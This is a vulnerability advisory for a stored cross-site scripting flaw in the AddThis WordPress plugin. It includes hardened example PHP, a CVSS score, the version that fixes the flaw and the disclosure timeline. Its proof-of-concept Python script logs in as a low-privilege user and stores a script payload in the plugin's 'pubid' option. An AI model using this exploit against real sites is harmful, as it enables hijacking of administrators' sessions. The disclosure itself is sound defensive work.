Smart Website Tools by AddThis 4.0.6 - 4.0.7, Persistent XSS

The Smart Website Tools by AddThis plugin exposes an AJAX function called ‘at_async_loading’ in ‘addthis/addthis-for-wordpress.php’. Access to this function is restricted to Registered users but not to Administrative users, so anyone with an account on the target site can call it. The value of the ‘pubid’ parameter is also not sanitized, so arbitrary HTML or JavaScript code can be stored in that option. The stored code is then executed when a user visits the Settings page for this plugin (wp-admin/options-general.php?page=addthis_social_widget).
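The two missing controls described above (a capability check beyond "is logged in", and sanitization of ‘pubid’) are cheap to add in a WordPress AJAX handler. The following is an added example written for this advisory, not the plugin's own code and not the vendor's fix; the action name ‘example_save_pubid’, the option name ‘example_pubid’, the nonce name and the character set allowed for a publisher id are assumptions, and the WordPress API calls are standard ones.

```php
<?php
// Added example (not the plugin's code): a hardened AJAX handler that stores a
// publisher id option. It adds the capability check and input sanitization the
// advisory says were missing, plus CSRF protection and output escaping.
// Action, option and nonce names are assumed for illustration.

add_action( 'wp_ajax_example_save_pubid', 'example_save_pubid' );

function example_save_pubid() {
    // 1. Capability check: being logged in is not enough. Only users allowed to
    //    manage options may change plugin settings (wp_send_json_error() exits).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'insufficient privileges' ), 403 );
    }

    // 2. CSRF protection: the request must carry a nonce issued for this action
    //    (check_ajax_referer() terminates the request on failure).
    check_ajax_referer( 'example_save_pubid', 'nonce' );

    // 3. Input validation: a publisher id is an opaque token, so reject anything
    //    outside a conservative character set instead of storing raw input.
    //    The pattern is an assumption; use the vendor's real id format.
    $pubid = isset( $_POST['pubid'] ) ? sanitize_text_field( wp_unslash( $_POST['pubid'] ) ) : '';
    if ( '' === $pubid || ! preg_match( '/^[A-Za-z0-9_.-]{1,64}$/', $pubid ) ) {
        wp_send_json_error( array( 'message' => 'invalid pubid' ), 400 );
    }

    update_option( 'example_pubid', $pubid );
    wp_send_json_success( array( 'pubid' => $pubid ) );
}

// 4. Output escaping on the settings page: even if a bad value reaches the
//    database by some other path, esc_attr() keeps it inside the attribute,
//    which is what directly prevents the stored XSS from firing.
function example_render_pubid_field() {
    $pubid = get_option( 'example_pubid', '' );
    printf(
        '<input type="text" name="pubid" value="%s" />',
        esc_attr( $pubid )
    );
    wp_nonce_field( 'example_save_pubid', 'nonce' );
}
```

Each layer is independent: the capability check removes the "any registered user" exposure, the nonce stops a logged-in victim from being made to submit the change, the validation keeps markup out of the option, and the escaping makes the settings page safe regardless of what is stored.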

Homepage

https://wordpress.org/plugins/addthis/

CVSS Score

4

CVSS Vector

(AV:N/AC:L/Au:S/C:N/I:P/A:N)

Attack Scope

remote

Authorization Required

Registered

Mitigation

Update to version 5.0.4.

Proof of Concept

When executed, the following PoC will override the ‘pubid’ option with a malicious payload, which will allow execution of arbitrary JavaScript if a user visits the options page for the plugin (wp-admin/options-general.php?page=addthis_social_widget).

import requests
s = requests.session()
target = 'http://localhost'

# Log in as an ordinary Registered (non-Administrative) user
url = '%s/wp-login.php'%target
payload = {
        "log":"test",
        "pwd":"test",
        "wp-submit":"Log+In"
}
r = s.post(url, data=payload)

# Call the 'at_async_loading' AJAX handler; the unsanitized 'pubid' value is
# stored and later rendered on the plugin's Settings page
url = '%s/wp-admin/admin-ajax.php'%target
payload = {
        "action":"at_async_loading",
        "async_loading":1,
        "pubid":"'><script>alert(1)</script '"
}
r = s.post(url, data=payload)

Timeline

  • 2015-03-19: Discovered
  • 2015-03-19: Vendor notified
  • 2015-03-19: Vendor responded – link to report provided
  • 2015-03-20: Version 4.0.7 released – issue still present
  • 2015-03-26: Vendor responded with intent to fix
  • 2015-03-31: Update requested from Vendor
  • 2015-04-07: Vendor responded stating that a fix is in progress
  • 2015-04-13: Update requested from Vendor
  • 2015-04-16: Vendor states that fix is undergoing QA
  • 2015-05-04: Update requested from Vendor
  • 2015-05-11: Update requested from Vendor
  • 2015-05-12: Vendor states that fix was rejected by QA, has been redeveloped and has been passed back to QA for re-testing.
  • 2015-06-01: Notified vendor of intention to contact WordPress Plugins team
  • 2015-06-03: Version 5.0.4 released – issue resolved
  • 2015-06-10: Advisory released